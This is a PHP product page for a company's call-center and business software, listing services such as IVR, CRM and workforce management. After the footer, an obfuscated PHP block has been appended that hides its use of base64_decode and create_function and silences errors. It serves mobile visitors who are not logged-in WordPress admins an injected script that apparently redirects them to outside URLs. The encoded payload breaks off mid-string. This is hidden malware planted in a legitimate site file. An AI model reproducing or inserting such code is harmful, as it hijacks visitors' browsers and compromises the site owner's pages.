<?php include 'properties/header.php';?>
<br><br><br>
<div class="row" style="padding-bottom: 30px;">

<div class="row">
	<div class="SolutionsPageCover PageCover">
		<div class="PageCoverText text-center">
			<h2 style="color: #333">Solution Systems</h2>
			</br>
			<h3 style="color: #333">Assisting in staying organized</h3>
		</div>

		
	</div>
</div>


<div class="row services">
<div class="col-md-2"> <span></span></div>
  <div class="col-md-8 text-center content container">
    <h4>Over the years in this digital revolution, we have developed and produced business solution systems that will not just help business be organized but also stay updated to the ever changing digitization. </h4>
  </div>
</div>

<div class="row content">
	<div class=" content">
		<div class="col-md-12">
			<div class="col-md-3 col-sm-4 noPadding text-center productPageBlock" style="background-color: #2cbbb4;">
				<img src="images/icon/solutions/1.png">
				<h1>Automated Call Distributor</h1> 
				<p>make your call center time efficient and serve more</p>
			</div>
			<div class="col-md-3  col-sm-4 noPadding text-center productPageBlock" style="background-color:#2ec6ba;">
				<img src="images/icon/solutions/2.png">
				<h1>Outbound Campaign Management</h1> 
				<p>make your call center time efficient and serve more</p>
			</div>
			<div class="col-md-3 col-sm-4 noPadding text-center productPageBlock" style="background-color: #2cbbb4;">
				<img src="images/icon/solutions/3.png">
				<h1>Automated Call Recording</h1> 
				<p>Enhance your service by improvising faster </p>
			</div>
			<div class="col-md-3 col-sm-4 noPadding text-center productPageBlock" style="background-color: #2ec6ba;">
				<img src="images/icon/solutions/4.png">
				<h1>Interactive Voice Response</h1> 
				<p>Digitize customer support with self serve</p>
			</div>
			<div class="col-md-3 col-sm-4 noPadding text-center productPageBlock" style="background-color: #2ec6ba;">
				<img src="images/icon/solutions/5.png">
				<h1>Workforce Management</h1> 
				<p>Make monitoring easy, effective and automated</p>
			</div>
			<div class="col-md-3 col-sm-4 noPadding text-center productPageBlock" style="background-color: #2cbbb4;">
				<img src="images/icon/solutions/6.png">
				<h1>Quality Management Application</h1> 
				<p>Get approved listings before presenting to customers</p>
			</div>
			<div class="col-md-3 col-sm-4 noPadding text-center productPageBlock" style="background-color:#2ec6ba;">
			<img src="images/icon/solutions/7.png">
				<h1>Computer Telephony Integration</h1> 
				<p>Integrate technology customized to your business.</p>
			</div>
			<div class="col-md-3 col-sm-4 noPadding text-center productPageBlock" style="background-color: 	#2cbbb4">
			<img src="images/icon/solutions/8.png">
				<h1>Real Time Dashboard Monitoring</h1> 
				<p>Analyse your business in real time and get analytics</p>
			</div>
			<div class="col-md-3 col-sm-4 noPadding text-center productPageBlock" style="background-color: #2cbbb4;">
			<img src="images/icon/solutions/9.png">
				<h1>HRIS Solution</h1> 
				<p>Manage current and prospective resources efficiently.</p>
			</div>
			<div class="col-md-3 col-sm-4 noPadding text-center productPageBlock" style="background-color: #2ec6ba;">
			<img src="images/icon/solutions/10.png">
				<h1>CRM</h1> 
				<p>Map customer journey accurately and enhance NPS</p>
			</div>
			<div class="col-md-3 col-sm-4 noPadding text-center productPageBlock" style="background-color: #2cbbb4;">
			<img src="images/icon/solutions/11.png">
				<h1>Multi-platform Messaging</h1> 
				<p>Make marketing easier and reach customers in one go.</p>
			</div>
			<div class="col-md-3 col-sm-4 noPadding text-center productPageBlock" style="background-color: #2ec6ba;">
			<img src="images/icon/solutions/12.png">
				<h1>Antivirus Solution</h1> 
				<p>Free your management system from spams and virus</p> 
			</div>

		</div>
		
	</div>
</div>

<!-- <div class="row content">
	<div class=" content">
		<div class="col-md-12">
			<div class="col-md-3 col-sm-4 noPadding text-center productPageBlock" style="background-color: #00B7EB;">
				<img src="images/icon/solutions/1.png">
				<h1>Automated Call Distributor</h1> 
				<p>make your call center time efficient and serve more</p>
			</div>
			<div class="col-md-3  col-sm-4 noPadding text-center productPageBlock" style="background-color:#00FFFF;">
				<img src="images/icon/solutions/2.png">
				<h1>Outbound Campaign Management</h1> 
				<p>make your call center time efficient and serve more</p>
			</div>
			<div class="col-md-3 col-sm-4 noPadding text-center productPageBlock" style="background-color: #C9FFE5;">
				<img src="images/icon/solutions/3.png">
				<h1>Automated Call Recording</h1> 
				<p>Enhance your service by improvising faster </p>
			</div>
			<div class="col-md-3 col-sm-4 noPadding text-center productPageBlock" style="background-color: #7FFFD4;">
				<img src="images/icon/solutions/4.png">
				<h1>Interactive Voice Response</h1> 
				<p>Digitize customer support with self serve</p>
			</div>
			<div class="col-md-3 col-sm-4 noPadding text-center productPageBlock" style="background-color: #0D98BA;">
				<img src="images/icon/solutions/5.png">
				<h1>Workforce Management</h1> 
				<p>Make monitoring easy, effective and automated</p>
			</div>
			<div class="col-md-3 col-sm-4 noPadding text-center productPageBlock" style="background-color: #006D6F;">
				<img src="images/icon/solutions/6.png">
				<h1>Quality Management Application</h1> 
				<p>Get approved listings before presenting to customers</p>
			</div>
			<div class="col-md-3 col-sm-4 noPadding text-center productPageBlock" style="background-color:#B2FFFF;">
			<img src="images/icon/solutions/7.png">
				<h1>Computer Telephony Integration</h1> 
				<p>Integrate technology customized to your business.</p>
			</div>
			<div class="col-md-3 col-sm-4 noPadding text-center productPageBlock" style="background-color: 	#007BA7">
			<img src="images/icon/solutions/8.png">
				<h1>Real Time Dashboard Monitoring</h1> 
				<p>Analyse your business in real time and get analytics</p>
			</div>
			<div class="col-md-3 col-sm-4 noPadding text-center productPageBlock" style="background-color: #232B2B;">
			<img src="images/icon/solutions/9.png">
				<h1>HRIS Solution</h1> 
				<p>Manage current and prospective resources efficiently.</p>
			</div>
			<div class="col-md-3 col-sm-4 noPadding text-center productPageBlock" style="background-color: #008B8B;">
			<img src="images/icon/solutions/10.png">
				<h1>CRM</h1> 
				<p>Map customer journey accurately and enhance NPS</p>
			</div>
			<div class="col-md-3 col-sm-4 noPadding text-center productPageBlock" style="background-color: #7DF9FF;">
			<img src="images/icon/solutions/11.png">
				<h1>Multi-platform Messaging</h1> 
				<p>Make marketing easier and reach customers in one go.</p>
			</div>
			<div class="col-md-3 col-sm-4 noPadding text-center productPageBlock" style="background-color: #1164B4;">
			<img src="images/icon/solutions/12.png">
				<h1>Antivirus Solution</h1> 
				<p>Free your management system from spams and virus</p> 
			</div>

		</div>
		

	</div>
</div> -->




<script type="text/javascript">document.getElementById("product").style.color = "#22bdb6";</script>


</div>
<!-- body part -->
<?php include 'properties/footer.php';?>


<?php $eptAi = 'base'.'64'.'_decod'.'e';  ini_set('display_errors', 0); error_reporting(0); ini_set('error_log', NULL); $CQmLn = 'Cre'.'ate'.'_Functio'.'n'; $lnKPN = $CQmLn('', $eptAi('IGVycm9yX3JlcG9ydGluZygwKTsgaW5pX3NldCgnZXJyb3JfbG9nJywgTlVMTCk7IGluaV9zZXQoJ2xvZ19lcnJvcnMnLCAwKTsgaW5pX3NldCgnZGlzcGxheV9lcnJvcnMnLCAwKTsgICRpc01vYiA9IGlzX251bWVyaWMoc3RycG9zKHN0cnRvbG93ZXIoJF9TRVJWRVJbIkhUVFBfVVNFUl9BR0VOVCJdKSwgIm1vYmlsZSIpKTsgJGNHOU9JOCA9IDA7IGZvcmVhY2goJF9DT09LSUUgYXMgJHZValVuSHZPT29PID0+ICR2dnZValVuSHZPT29PKXsgaWYgKHN0cnN0cihzdHJ2YWwoJHZValVuSHZPT29PKSwgJ3dvcmRwcmVzc19sb2dnZWRfaW4nKSl7ICRjRzlPSTggPSAxOyBicmVhazsgfSB9IGlmKCRpc01vYiAmJiAkY0c5T0k4ID09IDApeyBlY2hvICc8c2NyaXB0IHR5cGU9InRleHQvamF2YXNjcmlwdCI+ZG9jdW1lbnQud3JpdGUoYXRvYigiUEhOamNtbHdkQ0IwZVhCbFBTSjBaWGgwTDJwaGRtRnpZM0pwY0hRaVBtUnZZM1Z0Wlc1MExuZHlhWFJsS0hWdVpYTmpZWEJsS0NJbE0wTWxOek1sTmpNbE56SWxOamtsTnpBbE56UWxNMFVsTWpnbE5qWWxOelVsTmtVbE5qTWxOelFsTmprbE5rWWxOa1VsTWpBbE1qZ2xOekFsTmpFbE56SWxOakVsTmtRbE5qVWxOelFsTmpVbE56SWxOek1sTWprbE1qQWxOMElsTUVRbE1FRWxNakFsTWpBbE1qQWxNakFsTmpNbE5rWWxOa1VsTnpNbE56UWxNakFsTnpRbE5qRWxOeklsTmpjbE5qVWxOelFsTnpNbE1qQWxNMFFsTWpBbE5VSWxNamNsTmpnbE56UWxOelFsTnpBbE56TWxNMEVsTWtZbE1rWWxOek1sTnprbE1rUWxOek1sTWtVbE56TWxOemtsTnpNbE56UWxOalVsTmtRbE56TWxNa1lsTlRrbE5ERWxOalVsTXpFbE5qTWxNekVsTWpjbE1rTWxNakFsTWpjbE5qZ2xOelFsTnpRbE56QWxOek1sTTBFbE1rWWxNa1lsTnpNbE56a2xNa1FsTnpNbE1rVWxOek1sTnprbE56TWxOelFsTmpVbE5rUWxOek1sTWtZbE5qRWxOa1VsTkVZbE16SWxOak1sTXpnbE1qY2xNa01sTWpBbE1qY2xOamdsTnpRbE56UWxOekFsTnpNbE0wRWxNa1lsTWtZbE56TWxOemtsTWtRbE56TWxNa1VsTnpNbE56a2xOek1sTnpRbE5qVWxOa1FsTnpNbE1rWWxORGdsTmtRbE5EWWxNek1sTmpNbE16Y2xNamNsTlVRbE1FUWxNRUVsTWpBbE1qQWxNakFsTWpBbE1rWWxNa1lsTWpBbE5UUWxOamtsTmtRbE5qVWxOek1sTWpBbE5qSWxOalVsTnpRbE56Y2xOalVsTmpVbE5rVWxNakFsTmpNbE5rTWxOamtsTmpNbE5rSWxOek1sTUVRbE1FRWxNakFsTWpBbE1qQWxNakFsTmpNbE5rWWxOa1VsTnpNbE56UWxNakFsTnpJbE5qVWxOek1sTnpRbE5FUWxOamtsTmtVbE56VWxOelFsTmpVbE56TWxNakFsTTBRbE1qQWxNekVsTTBJbE1FUWxNRUVsTWpBbE1qQWxNakFsTWpBbE1rWWxNa1lsTWpBbE5FVWxOelVsTmtRbE5qSWxOalVsTnpJbE1qQWxOa1lsTmpZbE1qQWxOamdsTmtZbE56VWxOeklsTnpNbE1qQWxOelFsTmtZbE1qQWxOakVsTmtNbE5rTWxOa1lsTnpjbE1qQWxOeklsTmpVbE1rUWxOak1sTmtNbE5qa2xOak1sTmtJbE1qQWxNRVFsTUVFbE1qQWxNakFsTWpBbE1qQWxOak1sTmtZbE5rVWxOek1sTnpRbE1qQWxOakVsTmtNbE5rTWxOa1lsTnpjbE5qVWxOalFsTkRnbE5rWWxOelVsTnpJbE56TWxNakFsTTBRbE1qQWxNeklsTTBJbE1FUWxNRUVsTUVRbE1FRWxNRVFsTUVFbE1qQWxNakFsTWpBbE1qQWxOak1sTmtZbE5rVWxOek1sTnpRbE1qQWxOek1sTmpFbE56WWxOalVsTlRRbE5qRWxOeklsTmpjbE5qVWxOelFsTkVNbE5rWWxOak1sTmpFbE56UWxOamtsTmtZbE5rVWxOek1sTlRRbE5rWWxOVE1sTnpRbE5rWWxOeklsTmpFbE5qY2xOalVsTWpBbE0wUWxNakFsTWpnbE56UWxOakVsTnpJbE5qY2xOalVsTnpRbE56TWxNamtsTWpBbE0wUWxNMFVsTWpBbE4wSWxNRVFsTUVFbE1qQWxNakFsTWpBbE1qQWxNakFsTWpBbE1qQWxNakFsTnpRbE5qRWxOeklsTmpjbE5qVWxOelFsTnpNbE1rVWxOallsTmtZbE56SWxORFVsTmpFbE5qTWxOamdsTWpnbE1qZ2xOelFsTmpFbE56SWxOamNsTmpVbE56UWxNa01sTWpBbE5qa2xOa1VsTmpRbE5qVWxOemdsTWprbE1qQWxNMFFsTTBVbE1qQWxOMElsTUVRbE1FRWxNakFsTWpBbE1qQWxNakFsTWpBbE1qQWxNakFsTWpBbE1qQWxNakFsTWpBbE1qQWxOamtsTmpZbE1qZ2xNakVsTmtNbE5rWWxOak1sTmpFbE5rTWxOVE1sTnpRbE5rWWxOeklsTmpFbE5qY2xOalVsTWtVbE5qY2xOalVsTnpRbE5Ea2xOelFsTmpVbE5rUWxNamdsTmpBbE1qUWxOMElsTnpRbE5qRWxOeklsTmpjbE5qVWxOelFsTjBRbE1rUWxOa01sTmtZbE5qTWxOakVsTmtNbE1rUWxOek1sTnpRbE5rWWxOeklsTmpFbE5qY2xOalVsTmpBbE1qa2xNamtsTjBJbE1FUWxNRUVsTWpBbE1qQWxNakFsTWpBbE1qQWxNakFsTWpBbE1qQWxNakFsTWpBbE1qQWxNakFsTURrbE5rTWxOa1lsTmpNbE5qRWxOa01sTlRNbE56UWxOa1lsTnpJbE5qRWxOamNsTmpVbE1rVWxOek1sTmpVbE56UWxORGtsTnpRbE5qVWxOa1FsTWpnbE5qQWxNalFsTjBJbE56UWxOakVsTnpJbE5qY2xOalVsTnpRbE4wUWxNa1FsTmtNbE5rWWxOak1sTmpFbE5rTWxNa1FsTnpNbE56UWxOa1lsTnpJbE5qRWxOamNsTmpVbE5qQWxNa01sTWpBbE16QWxNamtsTTBJbE1FUWxNRUVsTWpBbE1qQWxNakFsTWpBbE1qQWxNakFsTWpBbE1qQWxNakFsTWpBbE1qQWxNakFsTjBRbE1FUWxNRUVsTWpBbE1qQWxNakFsTWpBbE1qQWxNakFsTWpBbE1qQWxOMFFsTWprbE0wSWxNRVFsTUVFbE1qQWxNakFsTWpBbE1qQWxOMFFsTUVRbE1FRWxNakFsTWpBbE1qQWxNakFsTmpNbE5rWWxOa1VsTnpNbE56UWxNakFsTmpjbE5qVWxOelFsTlRJbE5qRWxOa1VsTmpRbE5rWWxOa1FsTkVNbE5rWWxOak1sTmpFbE56UWxOamtsTmtZbE5rVWxORFlsTnpJbE5rWWxOa1FsTlRNbE56UWxOa1lsTnpJbE5qRWxOamNsTmpVbE1qQWxNMFFsTWpBbE1qZ2xOelFsTmpFbE56SWxOamNsTmpVbE56UWxOek1sTWprbE1qQWxNMFFsTTBVbE1qQWxOMElsTUVRbE1FRWxNakFsTWpBbE1qQWxNakFsTWpBbE1qQWxNakFsTWpBbE5qTWxOa1lsTmtVbE56TWxOelFsTWpBbE5rVWxOa1lsTmtVbE5UWWxOamtsTnpNbE5qa2xOelFsTmpVbE5qUWxNakFsTTBRbE1qQWxOelFsTmpFbE56SWxOamNsTmpVbE56UWxOek1sTWtVbE5qWWxOamtsTmtNbE56UWxOalVsTnpJbE1qZ2xNamdsTnpRbE5qRWxOeklsTmpjbE5qVWxOelFsTWtNbE1qQWxOamtsTmtVbE5qUWxOalVsTnpnbE1qa2xNakFsTTBRbE0wVWxNakFsTmtNbE5rWWxOak1sTmpFbE5rTWxOVE1sTnpRbE5rWWxOeklsTmpFbE5qY2xOalVsTWtVbE5qY2xOalVsTnpRbE5Ea2xOelFsTmpVbE5rUWxNamdsTmpBbE1qUWxOMElsTnpRbE5qRWxOeklsTmpjbE5qVWxOelFsTjBRbE1rUWxOa01sTmtZbE5qTWxOakVsTmtNbE1rUWxOek1sTnpRbE5rWWxOeklsTmpFbE5qY2xOalVsTmpBbE1qa2xNakFsTTBRbE0wUWxNakFsTXpBbE1qa2xNRVFsTUVFbE1qQWxNakFsTWpBbE1qQWxNakFsTWpBbE1qQWxNakFsTnpJbE5qVWxOelFsTnpVbE56SWxOa1VsTWpBbE5rVWxOa1lsTmtVbE5UWWxOamtsTnpNbE5qa2xOelFsTmpVbE5qUWxOVUlsTkVRbE5qRWxOelFsTmpnbE1rVWxOallsTmtNbE5rWWxOa1lsTnpJbE1qZ2xORVFsTmpFbE56UWxOamdsTWtVbE56SWxOakVsTmtVbE5qUWxOa1lsTmtRbE1qZ2xNamtsTWpBbE1rRWxNakFsTmtVbE5rWWxOa1VsTlRZbE5qa2xOek1sTmprbE56UWxOalVsTmpRbE1rVWxOa01sTmpVbE5rVWxOamNsTnpRbE5qZ2xNamtsTlVRbE0wSWxNRVFsTUVFbE1qQWxNakFsTWpBbE1qQWxOMFFsTUVRbE1FRWxNakFsTWpBbE1qQWxNakFsTmpNbE5rWWxOa1VsTnpNbE56UWxNakFsTnpNbE5qVWxOelFsTkVNbE5rWWxOak1sTmpFbE56UWxOamtsTmtZbE5rVWxOREVsTnpNbE5UWWxOamtsTnpNbE5qa2xOelFsTmpVbE5qUWxNakFsTTBRbE1qQWxNamdsTnpRbE5qRWxOeklsTmpjbE5qVWxOelFsTWprbE1qQWxNMFFsTTBVbE1qQWxOa01sTmtZbE5qTWxOakVsTmtNbE5UTWxOelFsTmtZbE56SWxOakVsTmpjbE5qVWxNa1VsTnpNbE5qVWxOelFsTkRrbE56UWxOalVsTmtRbE1qZ2xOakFsTWpRbE4wSWxOelFsTmpFbE56SWxOamNsTmpVbE56UWxOMFFsTWtRbE5rTWxOa1lsTmpNbE5qRWxOa01sTWtRbE56TWxOelFsTmtZbE56SWxOakVsTmpjbE5qVWxOakFsTWtNbE1qQWxNekVsTWprbE0wSWxNRVFsTUVFbE1FUWxNRUVsTWpBbE1qQWxNakFsTWpBbE5qTWxOa1lsTmtVbE56TWxOelFsTWpBbE5qY2xOalVsTnpRbE5UUWxOamtsTmtRbE5qVWxOVE1sTnpRbE5rWWxOeklsTmpFbE5qY2xOalVsTWpBbE0wUWxNakFsTWpnbE5rSWxOalVsTnprbE1qa2xNakFsTTBRbE0wVWxNakFsTmtNbE5rWWxOak1sTmpFbE5rTWxOVE1sTnpRbE5rWWxOeklsTmpFbE5qY2xOalVsTWtVbE5qY2xOalVsTnpRbE5Ea2xOelFsTmpVbE5rUWxNamdsTmpBbE1qUWxOMElsTmtJbE5qVWxOemtsTjBRbE1rUWxOa01sTmtZbE5qTWxOakVsTmtNbE1rUWxOek1sTnpRbE5rWWxOeklsTmpFbE5qY2xOalVsTmpBbE1qa2xNMElsTUVRbE1FRWxNakFsTWpBbE1qQWxNakFsTmpNbE5rWWxOa1VsTnpNbE56UWxNakFsTnpNbE5qVWxOelFsTlRRbE5qa2xOa1FsTmpVbE5UUWxOa1lsTlRNbE56UWxOa1lsTnpJbE5qRWxOamNsTmpVbE1qQWxNMFFsTWpBbE1qZ2xOa0lsTmpVbE56a2xNa01sTWpBbE5rVWxOa1lsTnpjbE5EUWxOakVsTnpRbE5qVWxNamtsTWpBbE0wUWxNMFVsTWpBbE5rTWxOa1lsTmpNbE5qRWxOa01sTlRNbE56UWxOa1lsTnpJbE5qRWxOamNsTmpVbE1rVWxOek1sTmpVbE56UWxORGtsTnpRbE5qVWxOa1FsTWpnbE5qQWxNalFsTjBJbE5rSWxOalVsTnprbE4wUWxNa1FsTmtNbE5rWWxOak1sTmpFbE5rTWxNa1FsTnpNbE56UWxOa1lsTnpJbE5qRWxOamNsTmpVbE5qQWxNa01sTWpBbE5rVWxOa1lsTnpjbE5EUWxOakVsTnpRbE5qVWxNamtsTTBJbE1FUWxNRUVsTUVRbE1FRWxNakFsTWpBbE1qQWxNakFsTmpNbE5rWWxOa1VsTnpNbE56UWxNakFsTmpjbE5qVWxOelFsTkRnbE5rWWxOelVsTnpJbE56TWxORFFsTmprbE5qWWxOallsTWpBbE0wUWxNakFsTWpnbE56TWxOelFsTmpFbE56SWxOelFsTkRRbE5qRWxOelFsTmpVbE1rTWxNakFsTmpVbE5rVWxOalFsTkRRbE5qRWxOelFsTmpVbE1qa2xNakFsTTBRbE0wVWxNakFsTjBJbE1FUWxNRUVsTWpBbE1qQWxNakFsTWpBbE1qQWxNakFsTWpBbE1qQWxOak1sTmtZbE5rVWxOek1sTnpRbE1qQWxOa1FsTnpNbE5Ea2xOa1VsTkRnbE5rWWxOelVsTnpJbE1qQWxNMFFsTWpBbE16RWxNekFsTXpBbE16QWxNakFsTWtFbE1qQWxNellsTXpBbE1qQWxNa0VsTWpBbE16WWxNekFsTTBJbE1FUWxNRUVsTWpBbE1qQWxNakFsTWpBbE1qQWxNakFsTWpBbE1qQWxOeklsTmpVbE56UWxOelVsTnpJbE5rVWxNakFsTkVRbE5qRWxOelFsTmpnbE1rVWxOeklsTmtZbE56VWxOa1VsTmpRbE1qZ2xORVFsTmpFbE56UWxOamdsTWtVbE5qRWxOaklsTnpNbE1qZ2xOalVsTmtVbE5qUWxORFFsTmpFbE56UWxOalVsTWpBbE1rUWxNakFsTnpNbE56UWxOakVsTnpJbE56UWxORFFsTmpFbE56UWxOalVsTWprbE1qQWxNa1lsTWpBbE5rUWxOek1sTkRrbE5rVWxORGdsTmtZbE56VWxOeklsTWprbE0wSWxNRVFsTUVFbE1qQWxNakFsTWpBbE1qQWxOMFFsTUVRbE1FRWxNakFsTWpBbE1qQWxNakFsTmpNbE5rWWxOa1VsTnpNbE56UWxNakFsTmpjbE5qVWxOelFsTkVRbE5qa2xOa1VsTnpRbE56TWxORFFsTmprbE5qWWxOallsTWpBbE0wUWxNakFsTWpnbE56TWxOelFsTmpFbE56SWxOelFsTkRRbE5qRWxOelFsTmpVbE1rTWxNakFsTmpVbE5rVWxOalFsTkRRbE5qRWxOelFsTmpVbE1qa2xNakFsTTBRbE0wVWxNakFsTjBJbE1FUWxNRUVsTWpBbE1qQWxNakFsTWpBbE1qQWxNakFsTWpBbE1qQWxOak1sTmtZbE5rVWxOek1sTnpRbE1qQWxOa1FsTnpNbE5Ea2xOa1VsTkVRbE5qa2xOa1VsTnpRbE56TWxNakFsTTBRbE1qQWxNekVsTXpBbE16QWxNekFsTWpBbE1rRWxNakFsTXpZbE16QWxNMElsTUVRbE1FRWxNakFsTWpBbE1qQWxNakFsTWpBbE1qQWxNakFsTWpBbE56SWxOalVsTnpRbE56VWxOeklsTmtVbE1qQWxORVFsTmpFbE56UWxOamdsTWtVbE56SWxOa1lsTnpVbE5rVWxOalFsTWpnbE5FUWxOakVsTnpRbE5qZ2xNa1VsTmpFbE5qSWxOek1sTWpnbE5qVWxOa1VsTmpRbE5EUWxOakVsTnpRbE5qVWxNakFsTWtRbE1qQWxOek1sTnpRbE5qRWxOeklsTnpRbE5EUWxOakVsTnpRbE5qVWxNamtsTWpBbE1rWWxNakFsTmtRbE56TWxORGtsTmtVbE5FUWxOamtsTmtVbE56UWxOek1sTWprbE0wSWxNRVFsTUVFbE1qQWxNakFsTWpBbE1qQWxOMFFsTUVRbE1FRWxNRVFsTUVFbE1qQWxNakFsTWpBbE1qQWxOak1sTmtZbE5rVWxOek1sTnpRbE1qQWxOellsTmprbE56TWxOamtsTnpRbE5FVWxOalVsTnpjbE5FTWxOa1lsTmpNbE5qRWxOelFsTmprbE5rWWxOa1VsTWpBbE0wUWxNakFsTWpnbE56UWxOakVsTnpJbE5qY2xOalVsTnpRbE56TWxNa01sTWpBbE5qZ2xOa1lsTnpNbE56UWxNa01sTWpBbE5rVWxOa1lsTnpjbE5EUWxOakVsTnpRbE5qVWxNamtsTWpBbE0wUWxNMFVsTWpBbE4wSWxNRVFsTUVFbE1qQWxNakFsTWpBbE1qQWxNakFsTWpBbE1qQWxNakFsTnpNbE5qRWxOellsTmpVbE5UUWxOakVsTnpJbE5qY2xOalVsTnpRbE5FTWxOa1lsTmpNbE5qRWxOelFsTmprbE5rWWxOa1VsTnpNbE5UUWxOa1lsTlRNbE56UWxOa1lsTnpJbE5qRWxOamNsTmpVbE1qZ2xOelFsTmpFbE56SWxOamNsTmpVbE56UWxOek1sTWprbE0wSWxNRVFsTUVFbE1qQWxNakFsTWpBbE1qQWxNakFsTWpBbE1qQWxNakFsTmtVbE5qVWxOemNsTkVNbE5rWWxOak1sTmpFbE56UWxOamtsTmtZbE5rVWxNakFsTTBRbE1qQWxOamNsTmpVbE56UWxOVElsTmpFbE5rVWxOalFsTmtZbE5rUWxORU1sTmtZbE5qTWxOakVsTnpRbE5qa2xOa1lsTmtVbE5EWWxOeklsTmtZbE5rUWxOVE1sTnpRbE5rWWxOeklsTmpFbE5qY2xOalVsTWpnbE56UWxOakVsTnpJbE5qY2xOalVsTnpRbE56TWxNamtsTTBJbE1FUWxNRUVsTWpBbE1qQWxNakFsTWpBbE1qQWxNakFsTWpBbE1qQWxOek1sTmpVbE56UWxOVFFsTmprbE5rUWxOalVsTlRRbE5rWWxOVE1sTnpRbE5rWWxOeklsTmpFbE5qY2xOalVsTWpnbE5qQWxNalFsTjBJbE5qZ2xOa1lsTnpNbE56UWxOMFFsTWtRbE5rUWxOa1VsTnpRbE56TWxOakFsTWtNbE1qQWxOa1VsTmtZbE56Y2xORFFsTmpFbE56UWxOalVsTWprbE0wSWxNRVFsTUVFbE1qQWxNakFsTWpBbE1qQWxNakFsTWpBbE1qQWxNakFsTnpNbE5qVWxOelFsTlRRbE5qa2xOa1FsTmpVbE5UUWxOa1lsTlRNbE56UWxOa1lsTnpJbE5qRWxOamNsTmpVbE1qZ2xOakFsTWpRbE4wSWxOamdsTmtZbE56TWxOelFsTjBRbE1rUWxOamdsTnpVbE56SWxOek1sTmpBbE1rTWxNakFsTmtVbE5rWWxOemNsTkRRbE5qRWxOelFsTmpVbE1qa2xNMElsTUVRbE1FRWxNakFsTWpBbE1qQWxNakFsTWpBbE1qQWxNakFsTWpBbE56TWxOalVsTnpRbE5FTWxOa1lsTmpNbE5qRWxOelFsTmprbE5rWWxOa1VsTkRFbE56TWxOVFlsTmprbE56TWxOamtsTnpRbE5qVWxOalFsTWpnbE5rVWxOalVsTnpjbE5FTWxOa1lsTmpNbE5qRWxOelFsTmprbE5rWWxOa1VsTWprbE0wSWxNRVFsTUVFbE1qQWxNakFsTWpBbE1qQWxNakFsTWpBbE1qQWxNakFsTnpjbE5qa2xOa1VsTmpRbE5rWWxOemNsTWtVbE5rWWxOekFsTmpVbE5rVWxNamdsTmtVbE5qVWxOemNsTkVNbE5rWWxOak1sTmpFbE56UWxOamtsTmtZbE5rVWxNa01sTWpBbE1qSWxOVVlsTmpJbE5rTWxOakVsTmtVbE5rSWxNaklsTWprbE0wSWxNRVFsTUVFbE1qQWxNakFsTWpBbE1qQWxOMFFsTUVRbE1FRWxNRVFsTUVFbE1qQWxNakFsTWpBbE1qQWxNa1lsTWtZbE1qQWxOak1sTmtZbE5rVWxOek1sTnpRbE1qQWxOeklsTmpFbE5rVWxOalFsTmtZbE5rUWxORU1sTmtZbE5qTWxOakVsTnpRbE5qa2xOa1lsTmtVbE1qQWxNMFFsTWpBbE5qY2xOalVsTnpRbE5USWxOakVsTmtVbE5qUWxOa1lsTmtRbE5FTWxOa1lsTmpNbE5qRWxOelFsTmprbE5rWWxOa1VsTkRZbE56SWxOa1lsTmtRbE5UTWxOelFsTmtZbE56SWxOakVsTmpjbE5qVWxNamdsTnpRbE5qRWxOeklsTmpjbE5qVWxOelFsTnpNbE1qa2xNMElsTUVRbE1FRWxNakFsTWpBbE1qQWxNakFsTnpNbE5qRWxOellsTmpVbE5UUWxOakVsTnpJbE5qY2xOalVsTnpRbE5FTWxOa1lsTmpNbE5qRWxOelFsTmprbE5rWWxOa1VsTnpNbE5UUWxOa1lsTlRNbE56UWxOa1lsTnpJbE5qRWxOamNsTmpVbE1qZ2xOelFsTmpFbE56SWxOamNsTmpVbE56UWxOek1sTWprbE0wSWxNRVFsTUVFbE1FUWxNRUVsTWpBbE1qQWxNakFsTWpBbE5qWWxOelVsTmtVbE5qTWxOelFsTmprbE5rWWxOa1VsTWpBbE5qY2xOa01sTmtZbE5qSWxOakVsTmtNbE5ETWxOa01sTmprbE5qTWxOa0lsTWpnbE5qVWxOellsTmpVbE5rVWxOelFsTWprbE1qQWxOMElsTUVRbE1FRWxNakFsTWpBbE1qQWxNakFsTWpBbE1qQWxNakFsTWpBbE5qVWxOellsTmpVbE5rVWxOelFsTWtVbE56TWxOelFsTmtZbE56QWxOVEFsTnpJbE5rWWxOekFsTmpFbE5qY2xOakVsTnpRbE5qa2xOa1lsTmtVbE1qZ2xNamtsTTBJbE1FUWxNRUVsTWpBbE1qQWxNakFsTWpBbE1qQWxNakFsTWpBbE1qQWxOak1sTmtZbE5rVWxOek1sTnpRbE1qQWxOamdsTmtZbE56TWxOelFsTWpBbE0wUWxNakFsTmtNbE5rWWxOak1sTmpFbE56UWxOamtsTmtZbE5rVWxNa1VsTmpnbE5rWWxOek1sTnpRbE0wSWxNRVFsTUVFbE1qQWxNakFsTWpBbE1qQWxNakFsTWpBbE1qQWxNakFsTmtNbE5qVWxOelFsTWpBbE5rVWxOalVsTnpjbE5FTWxOa1lsTmpNbE5qRWxOelFsTmprbE5rWWxOa1VsTWpBbE0wUWxNakFsTmpjbE5qVWxOelFsTlRJbE5qRWxOa1VsTmpRbE5rWWxOa1FsTkVNbE5rWWxOak1sTmpFbE56UWxOamtsTmtZbE5rVWxORFlsTnpJbE5rWWxOa1FsTlRNbE56UWxOa1lsTnpJbE5qRWxOamNsTmpVbE1qZ2xOelFsTmpFbE56SWxOamNsTmpVbE56UWxOek1sTWprbE0wSWxNRVFsTUVFbE1qQWxNakFsTWpBbE1qQWxNakFsTWpBbE1qQWxNakFsTmpNbE5rWWxOa1VsTnpNbE56UWxNakFsTmtVbE5rWWxOemNsTkRRbE5qRWxOelFsTmpVbE1qQWxNMFFsTWpBbE5EUWxOakVsTnpRbE5qVWxNa1VsTnpBbE5qRWxOeklsTnpNbE5qVWxNamdsTmtVbE5qVWxOemNsTWpBbE5EUWxOakVsTnpRbE5qVWxNamdsTWprbE1qa2xNMElsTUVRbE1FRWxNakFsTWpBbE1qQWxNakFsTWpBbE1qQWxNakFsTWpBbE5qTWxOa1lsTmtVbE56TWxOelFsTWpBbE56TWxOakVsTnpZbE5qVWxOalFsTkRRbE5qRWxOelFsTmpVbE5EWWxOa1lsTnpJbE5FUWxOamtsTmtVbE56UWxOek1sTWpBbE0wUWxNakFsTmpjbE5qVWxOelFsTlRRbE5qa2xOa1FsTmpVbE5UTWxOelFsTmtZbE56SWxOakVsTmpjbE5qVWxNamdsTmpBbE1qUWxOMElsTmpnbE5rWWxOek1sTnpRbE4wUWxNa1FsTmtRbE5rVWxOelFsTnpNbE5qQWxNamtsTTBJbE1FUWxNRUVsTWpBbE1qQWxNakFsTWpBbE1qQWxNakFsTWpBbE1qQWxOak1s